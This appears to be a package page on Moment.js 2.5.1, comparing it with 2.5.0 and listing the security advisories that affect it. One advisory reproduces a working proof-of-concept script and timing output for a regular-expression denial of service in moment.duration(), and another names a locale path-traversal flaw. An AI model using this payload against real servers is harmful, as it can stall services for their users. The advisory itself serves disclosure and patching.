Moment.js version 2.5.1, released on January 22, 2014, is a minor update over its predecessor, version 2.5.0, released on December 23, 2013; both are maintained by Iskren Ivov Chernev. Focused on date parsing, manipulation and display, the library gives developers tools for handling time in JavaScript applications. The core functionality is unchanged between the two releases; the notable difference is in the development dependencies introduced in 2.5.1. Specifically, 2.5.1 adds testing and automation tooling based on Karma, along with the related karma-nodeunit, karma-sauce-launcher, karma-chrome-launcher and karma-firefox-launcher plugins, and the grunt-karma plugin. These changes do not affect the API exposed to end users, but they improve the library's testing infrastructure, which supports code quality and cross-browser compatibility. For developers using Moment.js, upgrading from 2.5.0 to 2.5.1 therefore brings a library exercised by automated tests that the previous version lacked, while the API and usage patterns remain the same, so the upgrade carries little friction. If your project already has a solid testing setup the upgrade may not seem critical, but for projects that require high stability and wide browser compatibility, upgrading to 2.5.1 is recommended. Note, however, that 2.5.1 (like 2.5.0) falls inside the affected range of every advisory listed below, so from a security standpoint the relevant upgrade targets are the fixed versions named in each advisory, not 2.5.1 itself.
All vulnerabilities affecting version 2.5.1 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration(). The proof of concept below feeds ever-longer strings of the form "-111...1" into moment.duration() and times each call:
// Proof of concept from the advisory: builds "-" followed by many "1"s and
// times moment.duration() on it.
var moment = require('moment');

// Note: the loop counter `i` is shared between genstr and the outer loop (the
// original PoC never declares it, so it is a global), and genstr produces
// len + 1 characters. That is why the COUNT and LENGTH values in the output
// below step by 10001 rather than 10000; the behaviour is kept as published.
var i;
var genstr = function (len, chr) {
  var result = "";
  for (i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};

for (i = 20000; i <= 10000000; i = i + 10000) {
  console.log("COUNT: " + i);
  var str = '-' + genstr(i, '1');          // e.g. "-111...1"
  console.log("LENGTH: " + str.length);
  var start = process.hrtime();
  moment.duration(str);                    // vulnerable call in moment < 2.11.2
  var end = process.hrtime(start);         // [seconds, nanoseconds]
  console.log(end);
}
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
The time per call grows faster than linearly with input length (about 0.6 s at 20 000 characters and 5.6 s at 60 000, roughly quadratic), so a single request carrying a few hundred kilobytes of digits is enough to stall the event loop. Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if a user-provided locale string (e.g. fr) is directly used to switch the moment locale.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Workaround: sanitize the user-provided locale name before passing it to moment.js, ideally by accepting only names from the set of locales the application actually bundles.